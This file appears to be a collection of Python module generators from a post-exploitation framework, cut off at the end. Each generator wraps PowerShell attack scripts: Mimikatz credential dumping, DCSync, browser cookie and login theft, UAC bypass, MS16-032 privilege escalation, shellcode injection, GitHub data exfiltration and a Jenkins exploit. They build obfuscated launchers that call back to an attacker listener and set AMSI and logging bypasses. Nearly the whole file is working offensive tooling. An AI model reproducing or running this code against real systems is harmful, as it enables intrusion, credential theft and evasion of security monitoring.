def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False # staging options if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] module_name = 'Write-HijackDll' # read in the common powerup.ps1 module source code module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script = module_code script_end = ';' + module_name + " " # extract all of our options listener_name = params['Listener'] user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] # generate the launcher code launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) if launcher == "": return handle_error_message("[!] Error in launcher command generation.") else: out_file = params['DllPath'] script_end += " -Command \"%s\"" % (launcher) script_end += " -DllPath %s" % (out_file) outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "Invoke-ShellcodeMSIL" for option,values in params.items(): if option.lower() != "agent": if values and values != '': if option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values.split("\\"))[1:] script_end += " -" + str(option) + " @(" + sc + ")" if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def preobfuscate_modules(self, obfuscation_command, reobfuscate=False): """ Preobfuscate PowerShell module_source files """ if not data_util.is_powershell_installed(): print( helpers.color( "[!] PowerShell is not installed and is required to use obfuscation, please install it first." )) return # Preobfuscate all module_source files files = [file for file in helpers.get_module_source_files()] for file in files: file = os.getcwd() + '/' + file if reobfuscate or not data_util.is_obfuscated(file): message = "[*] Obfuscating {}...".format( os.path.basename(file)) signal = json.dumps({ 'print': True, 'message': message, 'obfuscated_file': os.path.basename(file) }) dispatcher.send(signal, sender="empire") else: print( helpers.color( "[*] " + os.path.basename(file) + " was already obfuscated. Not reobfuscating.")) data_util.obfuscate_module(file, obfuscation_command, reobfuscate)
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = " Get-SharpChromium" #check type if params['Type'].lower() not in [ 'all', 'logins', 'history', 'cookies' ]: print( helpers.color( "[!] Invalid value of Type, use default value: all")) params['Type'] = 'all' script_end += " -Type " + params['Type'] #check domain if params['Domains'].lower() != '': if params['Type'].lower() != 'cookies': print( helpers.color( "[!] Domains can only be used with Type cookies")) else: script_end += " -Domains (" for domain in params['Domains'].split(','): script_end += "'" + domain + "'," script_end = script_end[:-1] script_end += ")" outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/recon/Find-Fruit.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "\nFind-Fruit" show_all = params['ShowAll'].lower() for option, values in params.items(): if option.lower() != "agent" and option.lower( ) != "showall" and option.lower() != "outputfunction": if values and values != '': if values.lower() == "true": # if we're just adding a switch script_end += " -" + str(option) else: script_end += " -" + str(option) + " " + str(values) if show_all != "true": script_end += " | ?{$_.Status -eq 'OK'}" script_end += " | Format-Table -AutoSize" outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def _generate_script_powershell(self, module: PydanticModule, params: Dict, obfuscate=False, obfuscate_command='') \ -> Tuple[Optional[str], Optional[str]]: if module.script_path: # Get preobfuscated module code if obfuscate: data_util.obfuscate_module( moduleSource=module.script_path, obfuscationCommand=obfuscate_command) module_source = module.script_path.replace( "module_source", "obfuscated_module_source") with open(module_source, 'r') as stream: script = stream.read() else: with open(module.script_path, 'r') as stream: script = stream.read() else: script = module.script script_end = f" {module.script_end} " option_strings = [] # This is where the code goes for all the modules that do not have a custom generate function. for key, value in params.items(): if key.lower() not in ["agent", "computername", "outputfunction"]: if value and value != '': if value.lower() == "true": # if we're just adding a switch # wannabe mustache templating. # If we want to get more advanced, we can import a library for it. this_option = module.advanced.option_format_string_boolean \ .replace('{{ KEY }}', str(key)) \ .replace('{{KEY}}', str(key)) option_strings.append(f'{this_option}') else: this_option = module.advanced.option_format_string \ .replace('{{ KEY }}', str(key)) \ .replace('{{KEY}}', str(key)) \ .replace('{{ VALUE }}', str(value)) \ .replace('{{VALUE}}', str(value)) option_strings.append(f'{this_option}') script_end = script_end \ .replace('{{ PARAMS }}', ' '.join(option_strings)) \ .replace('{{PARAMS}}', ' '.join(option_strings)) \ .replace('{{ OUTPUT_FUNCTION }}', params.get('OutputFunction', 'Out-String')) \ .replace('{{OUTPUT_FUNCTION}}', params.get('OutputFunction', 'Out-String')) script += script_end if obfuscate: script = helpers.obfuscate(self.main_menu.installPath, psScript=script, obfuscationCommand=obfuscate_command) script = data_util.keyword_obfuscation(script) return script, None
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False listenerName = params['Listener'] # staging options userAgent = params['UserAgent'] proxy = params['Proxy'] proxyCreds = params['ProxyCreds'] if (params['Obfuscate']).lower() == 'true': obfuscate = True ObfuscateCommand = params['ObfuscateCommand'] # read in the common module source code moduleSource = main_menu.installPath + "/data/module_source/privesc/Invoke-EventVwrBypass.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscation_command) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(moduleSource)) moduleCode = f.read() f.close() script = moduleCode if not main_menu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script return handle_error_message("[!] Invalid listener: " + listenerName) else: # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, bypasses=params['Bypasses']) encScript = launcher.split(" ")[-1] if launcher == "": return handle_error_message("[!] Error in launcher generation.") else: scriptEnd = "Invoke-EventVwrBypass -Command \"%s\"" % (encScript) if obfuscate: scriptEnd = helpers.obfuscate(main_menu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscation_command) script += scriptEnd script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): Passlist = params['Passlist'] Verbose = params['Verbose'] ServerType = params['ServerType'] Loginacc = params['Loginacc'] Loginpass = params['Loginpass'] print(helpers.color("[+] Initiated using passwords: " + str(Passlist))) # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code module_source = main_menu.installPath + "/data/module_source/recon/Fetch-And-Brute-Local-Accounts.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = " Fetch-Brute" if len(ServerType) >= 1: script_end += " -st " + ServerType script_end += " -pl " + Passlist if len(Verbose) >= 1: script_end += " -vbse " + Verbose if len(Loginacc) >= 1: script_end += " -lacc " + Loginacc if len(Loginpass) >= 1: script_end += " -lpass " + Loginpass if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) print(helpers.color("[+] Command: " + str(script_end))) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): username = params['Username'] password = params['Password'] instance = params['Instance'] no_defaults = params['NoDefaults'] check_all = params['CheckAll'] script_end = "" # read in the common module source code module_source = main_menu.installPath + "/data/module_source/collection/Get-SQLColumnSampleData.ps1" script = "" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) script = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) if check_all: aux_module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=aux_module_source, obfuscationCommand=obfuscation_command) aux_module_source = module_source.replace("module_source", "obfuscated_module_source") try: with open(aux_module_source, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print(helpers.color("[!] Could not read additional module source path at: " + str(aux_module_source))) script_end = " Get-SQLInstanceDomain " if username != "": script_end += " -Username "+username if password != "": script_end += " -Password "+password script_end += " | " script_end += " Get-SQLColumnSampleData" if username != "": script_end += " -Username "+username if password != "": script_end += " -Password "+password if instance != "" and not check_all: script_end += " -Instance "+instance if no_defaults: script_end += " -NoDefaults " outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common powerup.ps1 module source code module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() service_name = params['ServiceName'] # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD") script = module_code # generate the .bat launcher code to write out to the specified location launcher = main_menu.stagers.stagers['windows/launcher_bat'] launcher.options['Listener'] = params['Listener'] launcher.options['UserAgent'] = params['UserAgent'] launcher.options['Proxy'] = params['Proxy'] launcher.options['ProxyCreds'] = params['ProxyCreds'] launcher.options['ObfuscateCommand'] = params['ObfuscateCommand'] launcher.options['Obfuscate'] = params['Obfuscate'] launcher.options['Bypasses'] = params['Bypasses'] if params['Delete'].lower() == "true": launcher.options['Delete'] = "True" else: launcher.options['Delete'] = "False" launcher_code = launcher.generate() # PowerShell code to write the launcher.bat out script_end = ";$tempLoc = \"$env:temp\\debug.bat\"" script_end += "\n$batCode = @\"\n" + launcher_code + "\"@\n" script_end += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n" script_end += "\"Launcher bat written to $tempLoc `n\";\n" if launcher_code == "": return handle_error_message("[!] Error in launcher .bat generation.") else: script_end += "\nInstall-ServiceBinary -ServiceName \""+str(service_name)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\"" if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # First method: Read in the source script from module_source moduleSource = main_menu.installPath + "/data/module_source/situational_awareness/host/Invoke-Seatbelt.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscation_command) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(moduleSource)) moduleCode = f.read() f.close() script = moduleCode scriptEnd = 'Invoke-Seatbelt -Command "' # Add any arguments to the end execution of the script if params['Command']: scriptEnd += " " + str(params['Command']) if params['Group']: scriptEnd += " -group=" + str(params['Group']) if params['Computername']: scriptEnd += " -computername=" + str(params['Computername']) if params['Username']: scriptEnd += " -username="******" -password="******" -full" if params['Quiet'].lower() == 'true': scriptEnd += " -q" scriptEnd = scriptEnd.replace('" ', '"') scriptEnd += '"' if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, installPath=main_menu.installPath, obfuscationCommand=obfuscation_command) script += scriptEnd script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): username = params['Username'] password = params['Password'] instance = params['Instance'] check_all = params['CheckAll'] # read in the common module source code module_source = main_menu.installPath + "/data/module_source/recon/Get-SQLServerLoginDefaultPw.ps1" if main_menu.obfuscate: obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source") if pathlib.Path(obfuscated_module_source).is_file(): module_source = obfuscated_module_source try: with open(module_source, 'r') as f: module_code = f.read() except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file(): script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand) else: script = module_code if check_all: module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: with open(module_source, 'r') as auxSource: aux_script = auxSource.read() script += " " + aux_script except: print(helpers.color("[!] Could not read additional module source path at: " + str(module_source))) script_end = " Get-SQLInstanceDomain " if username != "": script_end += " -Username "+username if password != "": script_end += " -Password "+password script_end += " | Select Instance | " script_end += " Get-SQLServerLoginDefaultPw" if instance != "" and not check_all: script_end += " -Instance "+instance # Get the random function name generated at install and patch the stager with the proper function name if main_menu.obfuscate: script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = ( self.mainMenu.installPath + "/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1" ) if obfuscate: data_util.obfuscate_module( moduleSource=moduleSource, obfuscationCommand=obfuscationCommand ) moduleSource = moduleSource.replace( "module_source", "obfuscated_module_source" ) try: f = open(moduleSource, "r") except: return handle_error_message( "[!] Could not read module source path at: " + str(moduleSource) ) moduleCode = f.read() f.close() script = moduleCode # Need to actually run the module that has been loaded scriptEnd = "Invoke-ExfilDataToGitHub" # add any arguments to the end execution of the script for option, values in self.options.items(): if option.lower() != "agent": if values["Value"] and values["Value"] != "": if values["Value"].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += ( " -" + str(option) + ' "' + str(values["Value"]) + '"' ) if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand, ) script += scriptEnd # Get the random function name generated at install and patch the stager with the proper function name script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() list_tokens = params['list'] elevate = params['elevate'] revert = params['revert'] admin = params['admin'] domainadmin = params['domainadmin'] user = params['user'] processid = params['id'] script = module_code script_end = "Invoke-Mimikatz -Command " if revert.lower() == "true": script_end += "'\"token::revert" else: if list_tokens.lower() == "true": script_end += "'\"token::list" elif elevate.lower() == "true": script_end += "'\"token::elevate" else: return handle_error_message("[!] list, elevate, or revert must be specified!") if domainadmin.lower() == "true": script_end += " /domainadmin" elif admin.lower() == "true": script_end += " /admin" elif user.lower() != "": script_end += " /user:"******"": script_end += " /id:" + str(processid) script_end += "\"';" if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code # generate the launcher code without base64 encoding launcher = main_menu.stagers.stagers['multi/launcher'] launcher.options['Listener'] = params['Listener'] launcher.options['UserAgent'] = params['UserAgent'] launcher.options['Proxy'] = params['Proxy'] launcher.options['ProxyCreds'] = params['ProxyCreds'] launcher.options['SafeChecks'] = 'False' launcher.options['ScriptLogBypass'] = '******' launcher.options['AMSIBypass'] = '******' launcher.options['Base64'] = 'False' launcher_code = launcher.generate() # need to escape characters launcher_code = launcher_code.replace("`", "``").replace("$", "`$").replace( "\"", "'") script_end = 'Invoke-MS16-032 "' + launcher_code + '"' script_end += ';"`nInvoke-MS16032 completed."' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code # generate the launcher code without base64 encoding listener_name = params['Listener'] user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=False, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds) # need to escape characters launcher_code = launcher.replace("`", "``").replace("$", "`$").replace( "\"", "'") script_end = 'Invoke-MS16-032 "' + launcher_code + '"' script_end += ';"`nInvoke-MS16032 completed."' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-DCSync.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "Invoke-DCSync -PWDumpFormat " if params["Domain"] != '': script_end += " -Domain " + params['Domain'] if params["Forest"] != '': script_end += " -DumpForest " if params["Computers"] != '': script_end += " -GetComputers " if params["Active"] == '': script_end += " -OnlyActive:$false " outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf};" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/collection/Out-Minidump.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "" for option, values in params.items(): if option.lower() != "agent": if values and values != '': if option == "ProcessName": script_end = "Get-Process " + values + " | Out-Minidump" elif option == "ProcessId": script_end = "Get-Process -Id " + values + " | Out-Minidump" for option, values in params.items(): if values and values != '': if option != "Agent" and option != "ProcessName" and option != "ProcessId": script_end += " -" + str(option) + " " + str(values) if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # First method: Read in the source script from module_source module_source = main_menu.installPath + "/data/module_source/collection/Invoke-WireTap.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = 'Invoke-WireTap -Command "' # Add any arguments to the end execution of the script for option, values in params.items(): if option.lower() != "agent": if values and values != '': if values.lower() == "true": # if we're just adding a switch script_end += str(option) elif option.lower() == "time": # if we're just adding a switch script_end += " " + str(values) else: script_end += " " + str(option) + " " + str(values) script_end += '"' if obfuscate: script_end = helpers.obfuscate( psScript=script_end, installPath=main_menu.installPath, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_name = 'Get-EmailItems' folder_name = params['FolderName'] max_emails = params['MaxEmails'] # read in the common powerview.ps1 module source code module_source = main_menu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code + "\n" script_end = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" % ( folder_name, max_emails) outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) moduleCode = f.read() f.close() script = moduleCode # ridiculous escape format groups = " ".join([ '"\\""' + group.strip().strip("'\"") + '"""' for group in params["Groups"].split(",") ]) # build the custom command with whatever options we want command = '""misc::addsid ' + params["User"] + ' ' + groups # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: scriptEnd = helpers.obfuscate( main_menu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscation_command) script += scriptEnd script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_name = 'Disable-SecuritySettings' reset = params['Reset'] # read in the common powerview.ps1 module source code module_source = main_menu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code + "\n" script_end = "" if reset.lower() == "true": # if the flag is set to restore the security settings script_end += "Reset-SecuritySettings " else: script_end += "Disable-SecuritySettings " for option,values in params.items(): if option.lower() != "agent" and option.lower() != "reset" and option.lower() != "outputfunction": if values and values != '': if values.lower() == "true": # if we're just adding a switch script_end += " -" + str(option) else: script_end += " -" + str(option) + " " + str(values) outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "Invoke-Mimikatz -Command " if params['Username'] != '': script_end += "'\"lsadump::lsa /inject /name:" + params['Username'] else: script_end += "'\"lsadump::lsa /patch" script_end += "\"';" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/management/Invoke-RunAs.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) script = f.read() f.close() script_end = "\nInvoke-RunAs " # if a credential ID is specified, try to parse cred_id = params["CredID"] if cred_id != "": if not main_menu.credentials.is_credential_valid(cred_id): return handle_error_message("[!] CredID is invalid!") cred: Credential = main_menu.credentials.get_credentials(cred_id) if cred.credtype != "plaintext": return handle_error_message( "[!] A CredID with a plaintext password must be used!") if cred.domain != "": params["Domain"] = cred.domain if cred.username != "": params["UserName"] = cred.username if cred.password != "": params["Password"] = "******" + cred.password + "'" if params["Domain"] == "" or params["UserName"] == "" or params[ "Password"] == "": return handle_error_message( "[!] Domain/UserName/Password or CredID required!") for option, values in params.items(): if option.lower() != "agent" and option.lower() != "credid": if values and values != '': if values.lower() == "true": # if we're just adding a switch script_end += " -" + str(option) else: script_end += " -" + str(option) + " '" + str( values) + "'" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False # extract all of our options listener_name = params['Listener'] user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] # generate the launcher code launcher = main_menu.stagers.generate_launcher( listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) if launcher == "": return handle_error_message( "[!] Error in launcher command generation.") else: #Cmd = launcher print(helpers.color("Agent Launcher code: " + launcher)) # read in the common module source code module_source = main_menu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "\nExploit-Jenkins" script_end += " -Rhost " + str(params['Rhost']) script_end += " -Port " + 